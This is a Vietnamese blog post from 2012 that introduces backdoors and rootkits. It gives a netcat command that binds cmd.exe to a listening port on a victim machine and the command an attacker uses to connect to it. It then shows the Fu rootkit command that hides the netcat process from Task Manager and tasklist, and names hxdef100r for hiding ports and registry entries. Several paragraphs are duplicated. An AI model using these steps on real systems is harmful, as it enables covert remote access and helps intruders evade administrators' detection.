Thứ Bảy, 7 tháng 7, 2012
Tìm hiểu về BackDoor và Rootkit
1, Netcat có cả 2 version cho Windows và Linux. Chúng ta có thể download tại đây
Sau khi cài đặt đối với hệ điều hành Windows thi netcat chỉ cần duy nhất một files là nc.exe .
Command cho phép netcat lắng nghe ở cổng 8000 .
nc -l -p 8000 -t -e cmd.exe
-l : cho phép netcat ở chế độ lắng nghe
-p : cổng để netcat lắng nghe
-t : cho phép sử dụng kiểu kết nối telnet
-e : chạy chương trình sau khi kết nối
Vậy command ở đây cho phép hacker kết nối vào máy nạn với port 8000 và khởi động chương trình cmd.exe (command line) để thực thi các lệnh tấn công vào hệ thống. Command trên máy hacker:
Sau khi cài đặt đối với hệ điều hành Windows thi netcat chỉ cần duy nhất một files là nc.exe .
Command cho phép netcat lắng nghe ở cổng 8000 .
nc -l -p 8000 -t -e cmd.exe
-l : cho phép netcat ở chế độ lắng nghe
-p : cổng để netcat lắng nghe
-t : cho phép sử dụng kiểu kết nối telnet
-e : chạy chương trình sau khi kết nối
Vậy command ở đây cho phép hacker kết nối vào máy nạn với port 8000 và khởi động chương trình cmd.exe (command line) để thực thi các lệnh tấn công vào hệ thống. Command trên máy hacker:
nc -v 172.16.1.3 8000
ở đây nạn nhân là máy tính 172.16.1.3.
2, Trong quá trình hoạt động của tất cả backdoor luôn nằm trong Processes và Port Listener sẽ khiến cho quản trị hệ thống phát hiện sự bất thường. Vậy làm sao để ẩn dấu sau Processes và Port Listener ??? tới lúc này chúng ra sử dụng kỹ thuật rookit cho phép những processes của backdoor có thể ẩn nấp sâu vào trong hệ thống và khó phát hiện hơn. Với ví dụ ở phần 1 ta sẽ thấy trên hệ thống :
Port Listener
Processes
2, Trong quá trình hoạt động của tất cả backdoor luôn nằm trong Processes và Port Listener sẽ khiến cho quản trị hệ thống phát hiện sự bất thường. Vậy làm sao để ẩn dấu sau Processes và Port Listener ??? tới lúc này chúng ra sử dụng kỹ thuật rookit cho phép những processes của backdoor có thể ẩn nấp sâu vào trong hệ thống và khó phát hiện hơn. Với ví dụ ở phần 1 ta sẽ thấy trên hệ thống :
Port Listener
Processes
Ở đây processes nc của tôi có số process id = 2020. Để ấn dấu processes này tôi dùng rootkit Fu. Tải tại đây . Command
fu -ph 2020
Sau khi xong ta dung tasklist để view lại sẽ không còn thấy nc.exe nữa. Đã hoàn toàn được ẩn nấp vào trong hệ thống mà Task Manager cũng như tasklist không phát hiện được. Nhưng đối với “Fu” chỉ che giấu được processes không che giấu được Port Listener. Để làm được điều này ta có thể dùng rootkit “hxdef100r”. Rootkit này cho phép ân dấu cả folder, services, processes, port và registry. Đồng thời cũng tự tạo backdoor luôn. Vì đây là rootkit tương đối nguy hiểm tôi sẽ không đề cập đến cách cấu hình trong bài viết này. Các bạn có thể tham khảo tại đây. Hi vọng sau bài viết này các bạn đã có một cách nhìn tổng quan về Backdoor và Rootkit.
Sau khi xong ta dung tasklist để view lại sẽ không còn thấy nc.exe nữa. Đã hoàn toàn được ẩn nấp vào trong hệ thống mà Task Manager cũng như tasklist không phát hiện được. Nhưng đối với “Fu” chỉ che giấu được processes không che giấu được Port Listener. Để làm được điều này ta có thể dùng rootkit “hxdef100r”. Rootkit này cho phép ân dấu cả folder, services, processes, port và registry. Đồng thời cũng tự tạo backdoor luôn. Vì đây là rootkit tương đối nguy hiểm tôi sẽ không đề cập đến cách cấu hình trong bài viết này. Các bạn có thể tham khảo tại đây. Hi vọng sau bài viết này các bạn đã có một cách nhìn tổng quan về Backdoor và Rootkit.
Đăng ký:
Đăng Nhận xét (Atom)
Không có nhận xét nào: